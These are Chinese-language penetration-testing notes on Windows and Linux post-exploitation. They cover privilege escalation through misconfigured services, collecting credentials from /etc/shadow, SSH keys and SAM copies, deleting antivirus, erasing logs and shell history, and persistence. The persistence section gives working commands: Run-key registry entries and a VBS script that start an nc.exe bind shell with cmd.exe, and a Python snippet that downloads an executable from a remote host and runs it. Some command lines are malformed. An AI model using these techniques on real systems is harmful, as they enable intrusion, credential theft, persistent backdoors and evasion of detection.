利用配置不当提权
0x01 利用条件
权限分配不当,编写的软件直接是用system权限运行的,一些服务是以system运行的,如果可以替换文件为恶意的代码,然后服务启动的时候就会反弹回一个root的shell
找到一些默认system执行的服务,尝试替换启动服务的执行程序。
- NTFS权限允许users修改删除
0x02 命令行下快速发现不当配置
1. icals:(windows)
icacls C:\windows\*.exe /save perm /T save成perm文件名,且循环遍历windows目录
BU是普通users组,PU是powersuser组权限,查找文件下的FA::BU
i586-mingw32msvc-gcc -o admin.exe admin.c 编译成exe程序。
2.Find:(linux)
find / -perm 777 -exec ls -l {} \;
-perm指定权限
0x03 利用配置不当提权
应用系统的配置文件
- 应用连接数据库的配置文件
- 后台服务运行账号
0x04 信息收集
1.linux基本的信息收集
第一个是dns配置文件,做dns的劫持
shadow是用户名的密码,离线破解密码
2.windows下的信息收集
net share 开启一个共享,把c盘共享无限制。
域管理员将其激活。
WMIC执行普通命令行无法执行的命令。
第一个读取mac和ip
查看当前系统的进程。
结束calc.exe的进程
得到系统安装的软件的版本以及名字
删除杀毒软件在后台偷偷删掉:
查看共享文件夹
开启远程3389桌面
machinename修改为localhost
查看日志:
3.linux收集敏感信息
linux下:
/etc: 大量的配置文件
/etc/local/etc
/etc/passwd
/etc/shadow
.ssh;.gnupg 一般都是隐藏的使用ls -la显示出. .ssh存在已经登录过的ssh密钥
业务数据库
e-mail 身份认证服务器数据库
/tmp 临时目录存放临时数据
4.windows敏感信息收集
- Sam数据库;注册表文件
- %SYSTEMROOT%\repair\SAM sam修复时候保存的副本
- %SYSTEMROOT%\System32\config\RegBack\Sam
- 业务数据库
- 临时文件目录
- userProfile\APPData\Local\Microsoft\windows\Temporart internet Files\
0x05 隐藏痕迹
- 禁止在登录界面显示新建账号
删除日志文件
History history -c清除
lsattr 查看文件的权限
chattr +i .bash_history 历史命令不会添加在bash历史文件中 先删除再创建在加i
日志
auth.log/secure 登录日志
btmp/wtmp 数据文件 last查看历史登录信息 lastb
lastlog faillog /var/log
- 其他日志和HIDS等
0x06 放置隐藏后门
1.添加到自启项
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /tREG_SZ /d 'C:\svchost.exe /f
- 下载nc.exe到目录\system32\nc.exe
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ/d "C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe"接受反弹的shell
nc -nv 目标机器端口
2.vbs脚本
Dim objShell
Set objShell = WScript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 1234 -e cmd.exe"
Set objShell = Nothing
vbs
3.python
exe = 'http://dwiadwaad/svchost.exe'
r = requests.get(exe)
if os.path.exists(os.path.abspath(os.curdir)+r"\svchost.tmp.exe"): # if_muma.exe_exists
os.popen(os.path.abspath(os.curdir)+r"\svchost.tmp.exe") #exec_muma.exe
attrib +a +b +r +h 隐藏文件的操作
